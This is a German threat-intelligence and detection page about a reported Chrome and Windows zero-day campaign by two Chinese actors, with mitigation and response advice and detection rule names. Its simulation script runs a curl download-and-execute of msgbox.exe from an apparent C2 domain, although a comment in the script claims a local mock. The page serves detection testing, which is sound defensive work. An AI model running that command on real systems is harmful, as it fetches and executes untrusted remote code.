Chinesische Bedrohungsakteure kombinieren Zero-Day-Lücken in Browsern und Windows
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Zwei chinesische Bedrohungsakteure, UTA0560 und JungleBamboo, nutzen eine ausgeklügelte mehrstufige Exploiting-Kette, die sich gegen Google Chrome und den Windows-Kernel richtet. Die Angriffe nutzen ein Patch-Gap-Fenster aus, in dem Schwachstellen in Chromium behoben werden, bevor entsprechende Updates die veröffentlichten Google Chrome-Versionen erreichen. Spear-Phishing-Locks liefern verschiedene Nutzlasten, darunter das GRIMWEDGE JScript-Backdoor und die LONGTALE Chrome-Erweiterung.
Untersuchung
Die Netzwerksicherheitsüberwachung von Volexity hat am 1. September 2026 eine Spear-Phishing-Kampagne gegen NGOs identifiziert. Die Untersuchung deckte eine gemeinsame Exploiting-Kette auf, die CVE-2026-85046, CVE-2026-87491 und CVE-2026-85880 beinhaltete. Analysten trennten die Aktivitäten in zwei Cluster: UTA0560 setzt GRIMWEDGE ein und JungleBamboo nutzt SUPERSTOMP, um die LONGTALE-Erweiterung zu installieren.
Abmilderung
Organisationen sollten Google Chrome auf die neueste verfügbare Version aktualisieren, um die Exposition während der Patch-Gap-Perioden zu reduzieren. Sicherheitsteams sollten das Verhalten von ungewöhnlichen Chrome-Kindprozessen und unerlaubte Installationen von Chrome-Erweiterungen überwachen. Eine strenge E-Mail-Filterung gegen Spear-Phishing-Locks und die Überwachung auf verdächtige oder unerlaubte Erstellung von geplanten Aufgaben werden ebenfalls empfohlen.
Reaktion
Wenn eine Ausnutzung festgestellt wird, sollten betroffene Hosts sofort isoliert werden, um weitere Kommunikation mit der Befehls- und Kontrollinfrastruktur oder laterale Bewegungen zu verhindern. Einsatzkräfte sollten Speicherforensik an Chrome-Prozessen durchführen, um injizierten Shellcode zu identifizieren. Installierte Chrome-Erweiterungen sollten ebenfalls überprüft und geplante Aufgaben auf verdächtige Einträge wie Windows Scheduled System.
Angriffsablauf
Wir aktualisieren diesen Teil noch.
Erkennungen
Verdächtige CURL-Nutzung (über Befehlszeile)
Verdächtige Befehls- und Kontrollkommunikation durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfragen (über dns)
Verdächtige geplante Aufgabe (über Audit)
IOCs (HashSha256) zur Erkennung: Beachten Sie das (Patch-)Gap: Mehrere chinesische Bedrohungsakteure verketten 0-Day-Exploits in Chrome & Windows
IOCs (SourceIP) zur Erkennung: Beachten Sie das (Patch-)Gap: Mehrere chinesische Bedrohungsakteure verketten 0-Day-Exploits in Chrome & Windows
IOCs (DestinationIP) zur Erkennung: Beachten Sie das (Patch-)Gap: Mehrere chinesische Bedrohungsakteure verketten 0-Day-Exploits in Chrome & Windows
Chrome Zero-Day Exploit Chain Landing Pages [Webserver]
Erkennung von GRIMWEDGE JScript-Backdoor und Nutzlastbereitstellung (Windows-Prozesserstellung)
Simulationsausführung
-
Angriffsbericht & Befehle: Der Angreifer versucht, einen Fuß in das kompromittierte System zu bekommen, indem er das GRIMWEDGE JScript-Backdoor installiert. Um eine Erkennung durch einfache signaturbasierte AV zu vermeiden, nutzt der Angreifer
cmd.exeund das nativecurlHilfsprogramm, um einen Stufe-zwei-Lader namensmsgbox.exevon einer entfernten Befehl-und-Kontroll-(C2)-Infrastruktur herunterzuladen. Sobald der Download abgeschlossen ist, führt der Angreifer die Nutzlast sofort aus dem%TEMP%Verzeichnis aus, um die Zeit zu minimieren, die die Datei auf der Festplatte verbleibt, und um ein Verzeichnis zu nutzen, das von der grundlegenden Überwachung oft übersehen wird. Diese Sequenz ist darauf ausgelegt, dem spezifischen Kommandozeilenmuster zu entsprechen, nach dem die Erkennungsregel sucht. -
Regressionstest-Skript:
# Simulationsskript zur Auslösung der GRIMWEDGE-Erkennungsregel. # Dieses Skript erstellt eine Dummy-Datei, um die heruntergeladene Nutzlast zu simulieren. $tempDir = $env:TEMP $payloadName = "msgbox.exe" $payloadPath = Join-Path $tempDir $payloadName # 1. Erstellen Sie eine Dummy-"msgbox.exe", um die heruntergeladene Nutzlast zu simulieren # In einem echten Angriff wäre dies die tatsächliche schädliche Binärdatei. New-Item -Path $payloadPath -ItemType File -Force Set-Content -Path $payloadPath -Value "Dummy Payload Content" # 2. Führen Sie den genauen Befehlsstring aus, der in der Erkennungslogik identifiziert wurde. # Hinweis: Wir verwenden einen lokalen Echo/Mock-Ansatz für die URL, um sicherzustellen, dass der Befehlsstring genau übereinstimmt. cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe""" Write-Host "Simulation abgeschlossen. Überprüfen Sie SIEM auf Alarme, die dem GRIMWEDGE-Muster entsprechen." -
Bereinigungskommandos:
# Bereinigungsskript zum Entfernen der simulierten Nutzlast und Dateien. $tempDir = $env:TEMP $payloadPath = Join-Path $tempDir "msgbox.exe" if (Test-Path $payloadPath) { Remove-Item -Path $payloadPath -Force Write-Host "Bereinigung erfolgreich: $payloadPath entfernt." } else { Write-Host "Nutzlast nicht gefunden. Bereinigung nicht erforderlich." }